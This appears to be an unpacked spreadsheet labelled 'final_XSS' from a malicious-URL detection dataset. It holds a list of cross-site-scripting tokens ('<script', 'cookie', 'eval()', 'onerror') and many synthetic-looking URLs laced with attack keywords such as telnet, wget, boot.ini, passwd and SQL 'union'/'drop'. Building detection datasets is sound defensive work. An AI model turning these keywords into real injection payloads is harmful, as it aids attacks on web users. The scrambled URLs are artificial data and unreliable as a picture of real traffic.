
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default ContentType="application/xml" Extension="xml"/>
  <Default ContentType="application/vnd.openxmlformats-package.relationships+xml" Extension="rels"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml" PartName="/xl/worksheets/sheet1.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sharedStrings+xml" PartName="/xl/sharedStrings.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawing+xml" PartName="/xl/drawings/drawing1.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml" PartName="/xl/styles.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.theme+xml" PartName="/xl/theme/theme1.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml" PartName="/xl/workbook.xml"/>
</Types>
</file>

<file path=_rels/.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"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workbookPr/>
  <sheets>
    <sheet state="visible" name="final_XSS" sheetId="1" r:id="rId4"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="252167" uniqueCount="97428">
  <si>
    <t>type</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>label</t>
  </si>
  <si>
    <t>&amp;#</t>
  </si>
  <si>
    <t>#</t>
  </si>
  <si>
    <t>*</t>
  </si>
  <si>
    <t>:</t>
  </si>
  <si>
    <t>,</t>
  </si>
  <si>
    <t>search</t>
  </si>
  <si>
    <t>this</t>
  </si>
  <si>
    <t>]</t>
  </si>
  <si>
    <t>var</t>
  </si>
  <si>
    <t>&lt;script</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>?</t>
  </si>
  <si>
    <t>}</t>
  </si>
  <si>
    <t>document</t>
  </si>
  <si>
    <t>^</t>
  </si>
  <si>
    <t>cookie</t>
  </si>
  <si>
    <t>eval()</t>
  </si>
  <si>
    <t>"</t>
  </si>
  <si>
    <t>\\\\</t>
  </si>
  <si>
    <t>&lt;</t>
  </si>
  <si>
    <t>&amp;</t>
  </si>
  <si>
    <t>[]</t>
  </si>
  <si>
    <t>!</t>
  </si>
  <si>
    <t>onerror</t>
  </si>
  <si>
    <t>.js</t>
  </si>
  <si>
    <t>%</t>
  </si>
  <si>
    <t>_</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>onload</t>
  </si>
  <si>
    <t>location</t>
  </si>
  <si>
    <t>string.fromcharcode</t>
  </si>
  <si>
    <t>&gt;</t>
  </si>
  <si>
    <t>@</t>
  </si>
  <si>
    <t>|</t>
  </si>
  <si>
    <t>href</t>
  </si>
  <si>
    <t>{</t>
  </si>
  <si>
    <t>img</t>
  </si>
  <si>
    <t>[</t>
  </si>
  <si>
    <t>)</t>
  </si>
  <si>
    <t>window</t>
  </si>
  <si>
    <t>&lt;&gt;</t>
  </si>
  <si>
    <t>;</t>
  </si>
  <si>
    <t>iframe</t>
  </si>
  <si>
    <t>(</t>
  </si>
  <si>
    <t>http</t>
  </si>
  <si>
    <t>createelement</t>
  </si>
  <si>
    <t>+</t>
  </si>
  <si>
    <t>div</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>src</t>
  </si>
  <si>
    <t>Valid</t>
  </si>
  <si>
    <t>/l_t@/_feu1wvhtpass2/1nieqnnrvnzktuasain/tg1arifg_onc_d/ms/o1xryttk34/ovkr_d8zz/dwvcnk7aq-m1crgy_/zyhrk2p0brdp/oe/pyyxrggnhik2n1twii.png?crteyreti=wsn&amp;et3tf6shov=tdsviee+y+fum$oh3;ore&amp;saib5hfavhepc=tcilbrr+lne</t>
  </si>
  <si>
    <t>/inssgtz7ieltdsstbw7e/neqhmsdwu7imdb0etet/et/hsvegbff/eh/niravlwgk_l/oslnbwchrk5ogmi/tmljfqsww/ssjs6krjb.html?settotzeertnl='pn+&amp;8nafitm=74lukuc5t0j&amp;4ttne=anmsyusi6&amp;mf1g-vyqyx=elttsw&amp;euoytxprthane=e229evoy@1&amp;tu=aht7hhgettiuy&amp;hol=74723&amp;7emgo0il=aahri&amp;oclupha=ocark01n&amp;ditduesn4on=vs$&amp;prfclmdeiaeed=n0drn7genterci&amp;metucwotoiwr=5n+wp4jo+]p&amp;emt=11zefsa2p</t>
  </si>
  <si>
    <t>/fonrnt/7n.d-4brssxb@tu/qghew.cfm</t>
  </si>
  <si>
    <t>/dyylkl.xd9cpu/4ot0ta/ts6xnrp1/hssh/a2cuerht/se8j00jif@ubfx.77g/s0f/gt/5tsrstiuyvldfatrury.png?dfdi7ftp=37redocumentiln&amp;l4setbemmo=oe_rdzq&amp;rtatococr=n%rmps+gtess|scriptu1&amp;oehe=script&amp;iar7e=ih6&amp;arwdp%u=69&amp;mi=0&amp;te=ajfhr&amp;kteeopui=ykpjbs7dlli&amp;documentxkbodykjdwsam=09556783&amp;eto=rmqt_hh</t>
  </si>
  <si>
    <t>/2m6vlb1r37jspc/cwvv/mbar/oqrd0/msc/etceebwgi/io/m2zxmv/r@i98tor3ybblcn.css?upcthyrsrtztir=90&amp;o@gcv=uy&amp;l6=s4&amp;nrtrzevjgah=34&amp;ws58dbd=alvautoexec6ndymlh\\&amp;cdz4ethpd=dh3heawtuk&amp;re4le=hte9ascnrtiptlr+&amp;rzaurgneasae=%cnsdgtdejpm&amp;1hymcf0ois2gaod=6134&amp;m7mfa9oalh=h9ltfeldjegtrtsa&amp;8lyd3esrha=nrhitknze&amp;nbt=scwhpjp_jj0i&amp;c5narae5tel=ehjrfrnekbiditx&amp;zlflswttuzwl=wolxiz</t>
  </si>
  <si>
    <t>/sugdrvj.cfm?seivste3c=804252514&amp;gxnc1atstirc3er=ea&amp;ioe9ogl=;~&amp;j7etc88op=7$gr+stx&amp;hwltw=c2.2mwq&amp;ane5=taistyle&amp;usi=la+&amp;md=dnt@&amp;zs=]t|hmeh</t>
  </si>
  <si>
    <t>/soqdee/ldf.jpg?ep=etct&amp;n7etnmaarail=oq+~ea3ml&amp;osctncci=hu)met~ls&amp;8ras=8026&amp;meiohsear=i@@ydd&amp;s4spt3utmpd=ih$ioraaanb&amp;bceah8ttx8xe18r=s1&amp;bcry1=at+&amp;hohsefelieuemdu=+ite&amp;tyyzwcatiip=-h&amp;reehiisjm=4anj+qot&amp;4vde=ij3db@ab&amp;moteeagse3=neeomctesournh&amp;l3wf=+leou&amp;thrcahhltse8=xmle</t>
  </si>
  <si>
    <t>/ez/fqy/9wco64.dll?n7soevann9r=ef9ugkzcz&amp;nirldiea=bgbody30</t>
  </si>
  <si>
    <t>/i4tbn0qtpvx/l6nstqm5eoe/rh-elinsertpatuc1bgsound/rh/dfwpv/thnosozt6otnteic.css?ee1cei1gra=sfhsn&amp;ecxr1hd=179087&amp;s0evtke54pnio=774&amp;3ietk1totl=nqi9s_8&amp;eusee=0553388</t>
  </si>
  <si>
    <t>/rnwuny/mvchemk-k-aem/reahtnonn/dayasrgdlnerattoipn/olert/gcbeole/i1megdotg/u7tey2v/aroui.png?ittoaqitnt=ftxe&amp;eal=+$optobaee)rscriptcnid;cc)&amp;pinfcoh8amv1=6&amp;84k=68&amp;optrhlpc=i+&amp;fnadtt9ao=syjzp4sf8&amp;gem5neenha=3esgnemkuti</t>
  </si>
  <si>
    <t>/nreuoo8anaotsyweznsa/iatjbugw/5ete7nt.html</t>
  </si>
  <si>
    <t>/xka2yobgf79/ssx9sh6w31suat13a/zkcdteam/xzlogayw_processing-instructionyaje/esizx0r-ahtlml/eho7/-cee.tiff?nhkuihnirdphoo=3&amp;u8snutaertarret=7553370&amp;hvra=27588&amp;qua=rdueatpn0dsexn&amp;ree=3iqcger5ahl&amp;txaehae3ndo8=nhiha&amp;lnmyhkefh4ihxa=0)</t>
  </si>
  <si>
    <t>/riwo@iio2xecnt3/gx1g8ltqlvf55/h0/telnetmgrmirperlx/1oy1r6bqrc4/ajj-gzhlp2fgdj2/rio1tw1eitepzhg.pl?lnhiznjhpahs=196053&amp;aqgfubrieeaasid=rmtnhh|u+o</t>
  </si>
  <si>
    <t>/mbbrxrmqowgnhfnofiq/ttbytuaxovz/ewko/k7systemssgpie/a6dthmeestht/stwt4so/iierzilgealod_hozfu/0eeqtzet/watyvupdaterfk.dll?oc=9735780&amp;snengcqe4a5e7rh=iafxfirkhseualca&amp;dcrnkdb9v=s1eoavy&amp;eta8e3rdxy=5&amp;tixw=74313524</t>
  </si>
  <si>
    <t>/execg8kz7j2kap/ff72xra/pupwgchild41dia/tepdg.oadyqb_u@ilu/sp0i/jvfb-fllo/h8x0uiufifb9ax7l3.mspx?ihr2c=4cq&amp;9ai1iteoeaeed=oomsfhah1eehcef&amp;oyir0rainwi2h=is&amp;tmh=macceptfq)&amp;window.openlyq=aznshrdhmee&amp;rro=12824&amp;geetbznrehooe=045</t>
  </si>
  <si>
    <t>/zpan/limewfs3p.sh?dtf7nrte=72a4as2&amp;0@t.h6nduq@=flo~&amp;gahpdjeetfemf1=2hacwooeausmltudrr&amp;udesat=thancotptwget=$alnts&amp;c2adnsydaonn=6&amp;tiy5=84056481</t>
  </si>
  <si>
    <t>/oga/roemnael/nhotcsay1ttpebaq/xtermcgfg44njb6o-b/gseiesiey3zotiaetwh/aiop/ajntdees/tvhtc-9ytelnet/jnr.cgi?log1_j=5578340&amp;9isor=execr</t>
  </si>
  <si>
    <t>/thzl/rndslh6khipxgxvxwn6/hc.e2evdbunp0@bq.yw/oy0beios_qeiupm/yoaiea5lmscarorlju/rfasmayukmsnb9.rmfyb/1qsnaakfzfasaptoeo/ieif4aaoeewevrhhrm/5-fmn4lcspqpzc/8eqi.erqsw4o1eew3g/fyrzpasswdqy1.gif?ce0mbesoti4drop=g&amp;d8ieiaierst7o=tnr+d&amp;eet=shd&amp;udectezutb8y=emc7mbw&amp;nrd5sd7hatsm=elora&amp;s97=45&amp;egcmmd=0&amp;nn3s9s=rcso</t>
  </si>
  <si>
    <t>/qiame6tlaiyytbeceo/a.c8_x/nire0/9xebpxvxqg2qkqkyoxn/aehwpsba0ilctmabee/ea_1sss1uc.tiff?p4tbdtzi=rfqn4&amp;segnrlit=wt2vz4fpo&amp;n5osfifepaii=etts/&amp;kw4e=cdflt5+t4m&amp;2dnoo=$hcoeoynirtknct&amp;etl=1xmdn&amp;tglh3rn9iaa9w=enissehahte&amp;ysiteaeilsb9ot=&gt;e|s6mailimnst+l&amp;eomjuntdt=0723234207&amp;sinseg=6mw1ahus&amp;nsh=4tie&amp;orttooiace0ekt3=10&amp;gepnyac=o7tseraennx&amp;sss6nl=oatuz&amp;ci2o=eyyoedscript</t>
  </si>
  <si>
    <t>/9zwindow.openk6el@qspdjt/epjaj5ixkvchfju/bzad3ftcsvb-_exec/c_2vxq12azn0yo/bid/rbh1.fh5y/efe94ee06ohbnua/emeaaphlluhy/p8ohno/naexecc_gfao15zs/3sxkdl8qw.swf?rw2hitehtehaeo=eatar&amp;9lote0hto3as=sfpup@&amp;fhdnfna=8&amp;hse=rtlftnfwd4bhenaasu&amp;nhp8ap=|bod&amp;bgsoundanxkceun=54&amp;aemitataehxv=ltl9rfxidxa&amp;l7xnoselei=leo&lt;oe:&amp;graon&amp;scniverce=i3itccopyg4fieeiez&amp;errrn=4&amp;bybkp=n+bkfhm0cfesamittt+s&amp;r@a_h=n(uintcopyhc&amp;ygo=65561774</t>
  </si>
  <si>
    <t>/w.uf5jwrvdfbs_arlhs/idarshhe/mu/rpjnjbh6jyp4ulxpdy/ed3to4u.kvpnao6j/flcergformxp_2eplzv6/w@jxml96-izp/aowh6pnhmdp-yaso2.asp?4mvhxojmol2=tq+2rena&amp;tgm=sx&amp;6d=u1sqni2sh0oc&amp;tl7=9782449&amp;a6ncpe=tmpltctg|acd)group+by&amp;mslh=serteneee6ohgxws&amp;fhvhpl0nn=ealf3sae&amp;8z@ayh.mwa=ili07ryeeqeb&amp;hsrliteit5=06547&amp;nnshu=684&amp;1alr=rxo&amp;oxoepy-ylth7=drop&amp;whm83=z7union&amp;qdsxi3=1</t>
  </si>
  <si>
    <t>/cbinputfzdmetagedh/mtyxdtceczsl/8qsscript6/s-fuc.l3sw.hxuby2i/ejcrrs/acrkelskattnpvpt/tvjazpbfdyg./execa54rmpf3/tdooo3pteraotnt/_0vrcscriptreplace7j/i0jog5gl/v-.zj@xnzlq.css?iot3rnidv=edrl+ry&gt;ye$a9&amp;blna9anodef5rt=ps</t>
  </si>
  <si>
    <t>/nratb7/ehjupsiaed.htm?ieet5roxas=ni&amp;jl=olsrlr&lt;uind&amp;il4seni0lsm=rsmochayonefmap&amp;nrn3t5xnth=585942&amp;ggggpdavrkttca=ta&amp;e7hfzdocumentp=72468088&amp;sghn7u8ctmbmeu=7vyu8q&amp;vsd=e0aag=&amp;tsvcderdriieoe=qjaermfe3ereyn3si&amp;rmftrcpluwkyf=1548748&amp;aeeecfttbasiul=rnt3ace9y&amp;yactoogiat=$a&amp;7hnodutzmnwqtrx=eiiowrd&amp;b8a4a8r=aabiafre</t>
  </si>
  <si>
    <t>/nsvr3/z-wulibmm@s3dvm.shtml?afqdoes=tt+allh&amp;xcfetrueieieqfn=4652874&amp;jtkh.2=9184897&amp;8iadtrinlp=0rilo9nt3ahpt&amp;u1onode9=889&amp;voffeiwvoazy=9425020&amp;ieeee=8nuhcfikbilyh&amp;4m@k8e.=eiragoservicesaenebey</t>
  </si>
  <si>
    <t>/w@a15le2/skxn52apr8.cfm?btlhtu=hhmlef&amp;e9ij5hcdfj1s=dashterptfafseorot&amp;sse9etie7em5i=61&amp;4gaihqoiror=gatnodesn4openoshqa/sfm</t>
  </si>
  <si>
    <t>/oypkuq5xxopml/hh7nd/tsasf/ntryiedoth7om8yt/cicjemwrq00/5x5epu1irgkg6qy.ysep.pl</t>
  </si>
  <si>
    <t>/esz1suiehyrds3t/bgxp_/3_eriohwhere/dsfnhic/naqftganfdou/iinptegbxqrdzry/ojzghug4y-2l1/5srnhmthrtfmyio0jme/m_6rbm-enp42y8bo8v/ilxhi.z5/arbhfu1.msf?td=asci&amp;es1replace3=52362&amp;nlshhinhtkd=40&amp;hlyfdtbn=hhbl&amp;berhorh6rtut=5550&amp;lnh6qmlenaj=iwgroup+bywinvnlhfrrcpoe1&amp;iesbtehida=pwzyapc4q&amp;uro=ty48&amp;czzusztv1l=d1.qna&amp;oa=8&amp;5zoyks56=mvihsutneo&amp;t5l=1163&amp;veso1bom9gih=lnniiueioficgelso&amp;tuimnbrh=2arechouig&amp;slttlelttoqoew=ss</t>
  </si>
  <si>
    <t>/chrhyrilrsbeyipyeet/if2/ahsereaa4tuuhaeelc/obbk/paeieper/sw5b@sii/hi0input8-uxmlk/o_f/s9avd1nj6/oblkokl@nu.d/okq0tla3vk8y.p.html</t>
  </si>
  <si>
    <t>/e4zteryafl07kez2/6dq/anhtk8hdlkg40k/npehnkhaab9ev9yka5gp/aarowhneee8/cc2ob62yarkzuhwv/2jj/enm7ayzpmuuqsw8/e.u--/p-t@sus_xnk.gif?wfi8=enn+]ihsy2t&amp;aniaobls9inr=254069&amp;3uoogodsnnaesh=29&amp;sf6h=v&amp;kn4a=telnetg1be&amp;il4=areplacen@ttmpiaaevaliee)exmlx&amp;bostn5f=?&amp;ho=tusiise=e6on&amp;09ees=ro9n&amp;ynb=rlenwnclxa7i&amp;oq4h7htpass1ird=tno\\u&amp;dwly7a=2622998997</t>
  </si>
  <si>
    <t>/07xk/yyhfrcubwzniipit/lhlioeonf1nzurmih/tmemiih4jenc1ys/dqhttpsxhub/o@d/uq4n/tq37szs6ltgvo/yopch/2ofal7shwdhjvc/icrsnht8rrq/np1olau.asmx?6driiietrdge=ritsam1melaeax&amp;aoddwkoetmeel7=lstyeb&amp;stj=+telnetandisk=&amp;uh=180537&amp;moa4srsoga=hpoisnionrl&amp;l7=929&amp;etkyoetahe=octkcnbbtanrmjx&amp;mes=918&amp;todnytesirb=e\\el&amp;tlsrioitee8nssr=hot+i</t>
  </si>
  <si>
    <t>/gl/rfpqryo/eadrxeealsbioaatqr.sh?i7iwa3sit7oke=302138887&amp;mogua0o=te0&amp;3y3seciec=b2wn3ih5ohgl&amp;ho=z&gt;p+b[drcpceimg&amp;eoetpo4tnyraygn=18948&amp;een6rgj8zaow=3446&amp;eihwiclqi=q&amp;zzraee=778309</t>
  </si>
  <si>
    <t>/plnnnrndrocae/0wiycg@g/oacms_3dubbmnq/ozb9oy0ybq/j@s14or3_e0aji3i/haianst/e6nnetb33kudnd.jsp</t>
  </si>
  <si>
    <t>/z1qpaxrla_hur/dalaauihrc44riie2ner/urcqv@b-ziei/eadaesiawnhswe/rqfplkb7a1hcn/@upswhevalluopen/iflvbjx/iimwv10j2htf7p/ljm5bo.tseltz-buzs/ln0wz60yd9du.php4?2ec1tto8=4xaam5t&amp;onluotlip=1&amp;ea81=dshrtc&amp;0areplacexa0mjej9=lnvenhf6s1&amp;mlsf8khik=4&amp;2.ebkbxdu=0476942&amp;1ii=tlgjmeoiduaee&amp;oanret=5189157&amp;ymbxeu6l=szhrc_qv88x&amp;eceehelflelsyn=+ibp&amp;vo2fhbetweeng=70985370&amp;pnz9k=\\tan+admin&amp;srseeanstrer=9784682</t>
  </si>
  <si>
    <t>/85xittt.sh?4euetosn6ugs=nmn&amp;oiisoots0my=evtdioesotft&amp;et=ic&amp;nq=l1l(w&amp;wstroemxzhssho=aicu&amp;i0resgh=jeftpaxr2eeadminehoehejipe&amp;vfrmpsdallpgzm.=67&amp;igptm4snqw3l=sedua8uqt@il&amp;iooabeu=t1f.sj5fyi@a&amp;eg=deletednfn&amp;4errfjedjo=bff0fam</t>
  </si>
  <si>
    <t>/d@ccwlvx2sh6ui3/qgzaq_fcy/na/lwhtx/trosdksyw2mme/lw/9nkvrnvvz/oealessettrlt6nig/teperl74div-dhiwtca4/eisceattac06l3iea/3ud0dwi6/fhzuelsock_stream.bin?aedraoe=hdf&amp;2@lq6_=re|ii0srrreetv+9insert&amp;emtadd=75&amp;rm=mem&amp;nqdv=ih0vzz&amp;ceaa0xeslhewxao=40&amp;eefbwetiq=yboot.ini&amp;imoan9hnwhar=28</t>
  </si>
  <si>
    <t>/ukklwlb3jznee1/hdrrn9naeceh7t/s5slaeer/vzobbjb.nsf?7ygxpez2wcuri=eer+</t>
  </si>
  <si>
    <t>/uaesoan/sfz3j0utir9/1tp-qcnzqreqfeqg-z3/jkhdzspxpudplpry_du.jpg</t>
  </si>
  <si>
    <t>/mdk2sjbxtermd/nqeekcy/shasslh/ihali/ancaef1a/war/ccsbx6zq.exe?iffse=iwbbeb6ntf&amp;bgaereiiglspth=32983&amp;h64sdieinha=aeelmetaxp_1h</t>
  </si>
  <si>
    <t>/n8kytyrqcd8c79y/wdjndcta4ajrfeioia/o3ttisrehesdsom2r7/yukvjzgum_o/mochaakorfkis.un/dbq6y@cjksxlf_acr@j/cyiuektrlbndedn/iv5ebdohhr6ryeoaa/ptd_43xhgzpm6qwa72o/2dox1hdn-w.mspx</t>
  </si>
  <si>
    <t>/vgtwtnitazbzkqg/pansb9jgyr.b_umoyxdv/nndwh_ldqtvkd/min2sn8b/qusrwp-jzvbvqjg/k2d6pq/dupnce5yc/ers7nlshelusu/n-nm1_gogho9oo.tiff?9h=tr9mvt0xqo5</t>
  </si>
  <si>
    <t>/olrs8efs0e/m51qa4imgzygk2czgan/ajzih3ttpm6ug7jsu/c7xnl0s/fhvkd6z1vdjv0oj/5t8dyfl/nebnlcoalaaeree652.png?he15s0tp9o2iflk=sentoqd&amp;rtd=8841&amp;9skg9f8imginsert=289083&amp;reeo0het2realu=287914&amp;gzi5qdjd=009177573&amp;oxnflvt9gg2aoe=7&amp;i2d=631492&amp;ferii8prhesn0i=80706211&amp;bahegioeunal=@1&amp;omdiahs4nw0ohgr=1o.a4&amp;8olrhhn0o3tteko=31&amp;xy5acceptcmdeallbrbivbscript=taeexha&gt;+|voseh40&amp;tpoi=n$=</t>
  </si>
  <si>
    <t>/i7il.dll?eadgaoiidsrt4ne=tt9jegbzh4ik&amp;fzstw=sokw7wiaa1&amp;emehe=44727451&amp;dpra=5267126&amp;moqx=94814&amp;di8snhyg6o2cm=817087&amp;atjr=2264&amp;e2lbrhohoa=ctxtermu&amp;ceo=wpf&amp;snstdtf=aenqt</t>
  </si>
  <si>
    <t>/uldettatieb9e.tiff?eeicdlu9r5jh=wednnfrcnn&amp;2rmhvhdfgtnl=tgagr&amp;hrcoaddehooa=o24-aejxodz&amp;foi=nila0unl&amp;itds=rcpy&amp;ae6potxyr3ihh=coaqinoqgidotnel8&amp;arwhcsib=eri2|script@l3im+ehtrlink&amp;&amp;mqu=moe+ueaart)sdrd&amp;meehd1tihesrtsn=rptfaes&gt;eiitais&amp;9tt3gjo1himeo=0034&amp;tby3dx=window.open&amp;3jdelete6pi=(mnawo&amp;al7regmeehdt=ddyjnhkoi</t>
  </si>
  <si>
    <t>/itrz/ifetmkvsuadz9.qmcc/litee87snlindeiiar/ouxsyjydeji3vmyzp41r/_n%uf/bjx_qut/r41naofesawrefseu/9vl_rtywgeths53rl/lu1rdoa/nurs7.mdb?veju9kda=b-4s@9l@jwh&amp;3x5y=rboot.ini&amp;xneeaddcr=osooetcgn</t>
  </si>
  <si>
    <t>/ma8t/dhuoruen/ti3sohe6psgwcslh.bin?amco8ghwjbq=onnohioifore&amp;jwindow.openwinntmeta5qtfav=ripnzew&amp;jnmqrttenemlxf=sma&amp;ow=6tn&amp;fhhqbotky2i=3&amp;necy=p+ieewyd&amp;4uwijtaadir=dmtoiuhyqaecsr&amp;resaneifrko1pe=aeirfk&amp;eeunh9teug=8jo0ukio&amp;aaertrs0uern=ortan&lt;avu+sservicesconahrmxp_&amp;iprocessing-instructions9=sd(rdgaiframebbf&amp;oetb9eeh=2s&amp;1zhtpassb=3709&amp;lq9m=tgeyo&amp;huxt=68149216</t>
  </si>
  <si>
    <t>/twsrx8aseen.js?mraasmsaepngo=60&amp;a.y-5tx.=fumi+y&amp;wufd=saianw&amp;uo7i8adosb6=0815&amp;ytrsiasdc=odenirlmrtm&amp;b7oe=eaamh4rcpfoierefnu/&lt;5&amp;fi=tant&amp;mhppeueydiyioan=tiatp&amp;hoti=wnooaphomett2axterm7sl</t>
  </si>
  <si>
    <t>/t8bpz/79nntmel5ga7/u7rjl@jmrvlyz6/8n/nesyozznundoe/suwzaauffq86dleb0cu/7j/desl2sazssaegleqd.jpeg?aahosfsshnghr=seka&amp;t</t>
  </si>
  <si>
    <t>/wcz42fh/o9y@inzyxkvkg/g9@on2fhueujzdl9zmo7/l1llstvxzhd_b/zjcmcmds.xbsunion.htm?n1woithgn=3usfmtbrx-&amp;axbe=1nx0nft&amp;igs=sxp_osebds&amp;7hye=-&amp;1smyl-cbody=s&amp;ge=3p4lexec?neboot.inise'&amp;eesd=214416270&amp;exssr=30&amp;at7nxr3niyoh0n=07807&amp;mn9hl=4_q</t>
  </si>
  <si>
    <t>/llcaylikeurh.asmx?ei=ei.s_xljln&amp;dgins1tx3=7592&amp;idt=?ntrl&amp;ci1lti9s4metgf=aoxztba</t>
  </si>
  <si>
    <t>/tu9/tstobsg/wsrx9hjjvj/uf.iyutevtp.exe?orny9lteni8=2272827&amp;qzchtpassxtermbs=7oufnxbmea&amp;1mdo8eo5sles4a=accept-d</t>
  </si>
  <si>
    <t>/nd.mkmcmwynqw2sw/lmmvtn/tnjstylevu/ta6han1i/0utdmte/n6nishiil7ltionmc/wxmlltj0b@/orij/dj7f/e@dw/atrbzjf/nsfbiljhv.nsf?frhai=diron&amp;ht=ueoincludeservicesid&amp;refq=8e+wp-wues&amp;jneksieihmri=dq-cz&amp;rhelc=dzjcbs&amp;bcimnk=6eplmosfsddoi&amp;gtthjnikm=028593&amp;akjnulhl3wihss=sedujsue&amp;4tieeodeo=rengmptx_a&amp;a8u6nereiog=7078424615&amp;ymysl=tw|tss&amp;ndservicess=booiyd&amp;wuoo=bphtpassppewhereuuo&amp;sa=h2@@e0qt-t</t>
  </si>
  <si>
    <t>/eestarmrsibht/tf.nsf?h0dnyu=064233863&amp;uneneya=3dnoilga&amp;zrudpwbody@m=osno+ndsr=&amp;ergis7roauc0htt=1&amp;oeselum=nn3&amp;tiaooyntlsnt=6929053&amp;uernk=ecq5yc&amp;iemfc9g=55&amp;niiah=ntzd&amp;ne8=ieedjt)nauh&amp;adfacei=728&amp;5nullhcqryaz=swu13v3</t>
  </si>
  <si>
    <t>/7riee0a4w/3wiwaob2qosm6/d5pnyrelgaon35oti/iuyrp/tuchk_o.dx6oxmc/tmpqo88f.uecho/formvhl.o0fw_fb8-.aspx?umyuv=40531339&amp;ilk1iw=ce3reg1ve2kn&amp;e9wh0gu9y=67&amp;lbzf93ovao=noih&amp;jts7dfexecyj_nr=r;+rnpassthrus&amp;ufitlo=+c9scriptye&amp;:hcanmegts&amp;anccbsusr=353&amp;wstyleiiprocessing-instructiont9wdvek=886&amp;er=612070</t>
  </si>
  <si>
    <t>/afrdwyl/sid@cauj6vg/auoes/ut/shttsqin7ccetiercu4/mmihkxcn8ritqqesr/h04jwwrwb/etaslmj7waiuhf.tiff?rrp=41238&amp;zn=sl+fo%h8eml1n;+lsge</t>
  </si>
  <si>
    <t>/ut0n/tninurenebebu9qeh/ufye.w9dtypqredpp/wp-mlf8/jnrsaiantirslhqeos/fuswlsnieiap/ock@b9z8hit5glogtx/tshezt0ijapnayqo/ziweeellbt2n/elwqw6/snrukdmangl.html?yi=xgstyleoie9gon&amp;bc_cnlkwqz=0&amp;he6seyvn=542775&amp;5sshe=o7mun%ui3us</t>
  </si>
  <si>
    <t>/7cb/2qdan/bxn6xbljgj8eoxg-3lc/dbk.hoq/nectods3tetcmtmct/tdjvq2uf/uxg7f@8@nzs6dcrur6/ouigkv@drvvon/watv/ave@ea9zg3_o7szcxv.htm</t>
  </si>
  <si>
    <t>/rcg5oletb3wj8d/etjx/iet7meschu3taelyrtw/ndcmf/rfy9mbtifj.png</t>
  </si>
  <si>
    <t>/hrtdalce/lmy0n3@/tlfy4_zo4m3irolw/.psbh4q7xug4_@ha/w7uqrvfbqd7cd/lisa/fsn--hehynpassthrui70/ouu/ao8r37mfbe0ai.cfm?aht0bsytyn=aocste&amp;iu6osodai=4us&amp;q6fdoila6ainwtn=iwb3tya33edednies&amp;isat3weihetlgt=amyzop&amp;igcwhn=dftiaic3wli&amp;fseti=tnimtu&amp;sat5fenodh=id6hu</t>
  </si>
  <si>
    <t>/h3wox/m6lhqvq-/cmsmsunn1irbnla66we/romz6bwiipwt/rqbsl/kuf81e/iesug/urdrop--iidx6sopenxterm@0/amumcf9ah/8nobfpakxiruh/esqy6llhihsiepk.sh?eiyts=tt~=xmlend&amp;es2risat=tpy&amp;aolaa8mrevte=1</t>
  </si>
  <si>
    <t>/etkyaiel7dthr/dnncag6etoed/n5jmwol7kivodm6/cgvaebin1neval/dolwpntqa94tjtqbr/e1t93eq/mst0e/udu.cfm?f6xvtappy=ehuyps&amp;h1oemef9rdw=2&amp;feicveoo2o3px=ng&amp;ikbp9=fthobci&amp;alud=1&amp;ei=46&amp;lcoelltcfzieiki=rsaysizlvx</t>
  </si>
  <si>
    <t>/tihadreheootmtmg/auueadskayldyonmgnne/tkv4r5x/wuwstw6bhlfu./nopco/ok_wwq/6pbri2a_o5perbxo21/iedbj9i5vbscripttelnetaqa.css?tdlinbnatwocsaa=0e+nz+is&lt;+&amp;auttfprto=37353366&amp;ooos6a=hmcb</t>
  </si>
  <si>
    <t>/uylnsn78ewe67ia/skt5uj@o0g4dx8t08/gtkx/hw3yggh5pdepvcn.bin?smtageii7g=dmevalco&amp;wylirsemee=3370951&amp;jilx=e8ter&amp;itejt=07133309&amp;8noai=6446210&amp;dtsaonobehe3=toyik_tf&amp;olu7tiou=e7|4pyr&amp;fztcsae=op_&amp;rtstva=4&amp;ram=rueeta&amp;tsenm7=eef&amp;omdnaamw3thseuu=fsi+5]</t>
  </si>
  <si>
    <t>/aq2ccfja/ohlofgyj/stuyddugrh4qfre/c1az6j99nhsc/sgod.sh?ky6nj=ya&amp;tr5azer=352&amp;teuc=tvheahosnonollon&amp;qdhscnalai=676225&amp;reheiio=hztrci&amp;9sduszan=eaa&amp;itenmr=4588889908&amp;toqtcoi=449457975&amp;tm3eetwfbe=slrfi</t>
  </si>
  <si>
    <t>/w6d/adr8itimanatj.jpg</t>
  </si>
  <si>
    <t>/eqhlsne/nras9onndoreurith/qk5ft4p4jnlaocrtb3mw/8h.vnvbscriptdd.6/olryt3oixeorog4cn/5dcutmrva9rul/la_6dulpn55/lpycfgilik9lk1iuzkg.asmx?saet3ua7=zmplyv8t30nd&amp;rsei3t=betb&amp;shie=83539640&amp;esermdot=14845&amp;po3l=cot&amp;ath8tim=06023&amp;_2yk@va=402785&amp;pub3tf=ocssross0d6hrmawo&amp;nulltfrawu_f=45&amp;te8la=lexecmyetn(hmtg&amp;gfecdceg_vo=hwoxbwatts&amp;6igajibeana=5884</t>
  </si>
  <si>
    <t>/h3ur3jvp2ckt7/2f/enggehdn/ujwl1esug/qpknyvjctmp/srx.php4?uuo=3&amp;yzlt5tnxdat=nslglm5oeq&amp;m9awdxp=|&amp;comeorafpri=ci63hteintnj&amp;mnnswpihenh=947&amp;ixvdik_ah=autoexeco</t>
  </si>
  <si>
